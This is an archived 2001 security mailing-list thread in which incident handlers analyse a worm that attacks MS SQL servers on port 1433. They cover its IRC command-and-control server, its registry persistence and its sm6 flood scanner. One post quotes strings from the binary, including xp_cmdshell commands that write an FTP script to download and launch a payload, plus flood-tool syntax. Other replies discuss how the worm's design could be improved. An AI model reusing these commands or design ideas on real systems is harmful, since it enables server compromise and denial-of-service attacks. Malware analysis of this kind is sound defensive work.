Hmm, depends on the worm. If the worm detects new IRC servers and alternative ones, is able to build new FTP "centrals" and updates it's records through the IRC Channels, it would be able to build a network which is able to manage itself and update itself, the author would also be able to update the worm throgh one of the IRC servers if known and could add new attacks to it, if required. Hopefully this one is just stupid. Siberian CSC Sentry Research Labs (www.sentry-labs.com) On Tue, Nov 20, 2001 at 08:11:20PM +0100, Johannes Verelst wrote: > On Tue, 20 Nov 2001, Patrick Andry wrote: > > > Apparently the file is no longer available on the ftp server. > > Hopefully this worm is short-lived. > > The strange thing about this 'worm' is that it is totally dependant on > several central servers. Firstly, the FTP server where the files are > retrieved, secondly the IRC server (that has been slashdottet now > apparently). > > With Nimda, the tftp transfer was made from the infected to the infecting > host. I am not trying to give advice on writing worms, but that is > obviously a much better design. This worm will not spread massively since > the servers it is depandant on are down within hours. > > Just my 2 eurocents, > > Johannes > > > Arthur Donkers wrote: > > > > >Hi All, > > > > > >Analysed it a bit further (thanks to VMware and netmonitor) and > > >once it is started it connects to an irc server at bots.kujikiri.net, > > >port 6669. From the rest of the capture it seems it drops a message > > >there with the name of the machine it compromised and a password > > >like string. > > > > > >It furthermore (see strings output on executable, scan for registry > > >keys) adds itself to the Run entry in the registry so it is started > > >each time the machine is booted. A few of the registry keys: > > > > > > > > >SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TaskReg > > > > > >SOFTWARE\Microsoft\MSSQLServer\Client\SuperSocketNetLib\ProtocolOrder > > > > > >SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo\DSQUERY > > > > > >From the strings output it seems to contain a scanner (sm6 ..) that > > >will scan for new vulnerable machines. I'm not quite sure if and so, > > >how, it is controlled from the IRC channel. I've tested it on our > > >testing network so I'm not quite sure yet. > > > > > >I've attached the netmon capture file to this message. > > > > > >grtz, > > > > > >Arthur > > > > > >On Tue, 20 Nov 2001, Paul Nasrat wrote: > > > > > >>On Tue, Nov 20, 2001 at 09:54:18AM -0500, Douglas P. Brown wrote: > > >> > > >>>We saw a scan come in looking for systems answering on 1433, and > > >>>immediately saw several systems start scanning out for other systems > > >>>answering on 1433 - worm behavior? Has anyone else seen this? > > >>> > > >>No, but the binaries it downloads: > > >> > > >>win32mon.exe and dnsservice.exe > > >> > > >>Are on the ftp site in the dump. I don't have a windows debugger to put > > >>them through but they look interesting: > > >> > > >>exec xp_cmdshell 'start dnsservice.exe' > > >>exec xp_cmdshell 'del ftp.x' > > >>exec xp_cmdshell 'ftp -s:ftp.x > > >>exec xp_cmdshell 'echo quit >> ftp.x' > > >>exec xp_cmdshell 'echo close >> ftp.x' > > >>exec xp_cmdshell 'echo get dnsservice.exe>> ftp.x' > > >>exec xp_cmdshell 'echo cd tmp>> ftp.x' > > >>exec xp_cmdshell 'echo cd pub>> ftp.x' > > >>exec xp_cmdshell 'echo bin>> ftp.x' > > >>exec xp_cmdshell 'echo foo.com>> ftp.x' > > >>exec xp_cmdshell 'echo ftp> ftp.x' > > >> > > >>GET /%s HTTP/1.0 > > >>Connection: Keep-Alive > > >>User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686) > > >>[GET] - Unable to connect to http. > > >>[GET] - Unable to resolve host. > > >>http:// > > >>[GET] - Unable to create new socket. > > >>GET <bot|wildcard> <host> <save as> > > >>%s %s %s %s > > >>NOTICE %s :Voyager Alpha Force: Age of Kaiten (now with blitz-fu) > > >>NICK %s > > >>NOTICE %s :Nick cannot be larger than 9 characters. > > >>NOTICE %s :NICK <nick> > > >>sm6 has finished... > > >>with tcp/syn boost! > > >>sm6 icmp/udp has begun... > > >>sm6 icmp/udp (w/pkt-push!) has begun.. > > >>Syntax: sm6 <wildcard|botname> <dest> <-n timelength> [-d delay] [-s src > > >>port] [-p dst port] [-rR random src/all ports] [-z random src ips] [-t > > >>include tcp/syn] [-z randomize src ips] [-S pkt size] -b <bcast file> > > >> > > >>etc. > > >> > > >>Paul Nasrat > > >> > > >>---------------------------------------------------------------------------- > > >>This list is provided by the SecurityFocus ARIS analyzer service. > > >>For more information on this free incident handling, management > > >>and tracking system please see: http://aris.securityfocus.com > > >> > > > > > > > > >------------------------------------------------------------------------ > > > > > >---------------------------------------------------------------------------- > > >This list is provided by the SecurityFocus ARIS analyzer service. > > >For more information on this free incident handling, management > > >and tracking system please see: http://aris.securityfocus.com > > > > > > > > > > > ---------------------------------------------------------------------------- > > This list is provided by the SecurityFocus ARIS analyzer service. > > For more information on this free incident handling, management > > and tracking system please see: http://aris.securityfocus.com > > > > -- > "Programming today is a race between software engineers striving to build > bigger and better idiot-proof programs, and the Universe trying to produce > bigger and better idiots. So far, the Universe is winning." > > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 12:54:50 PST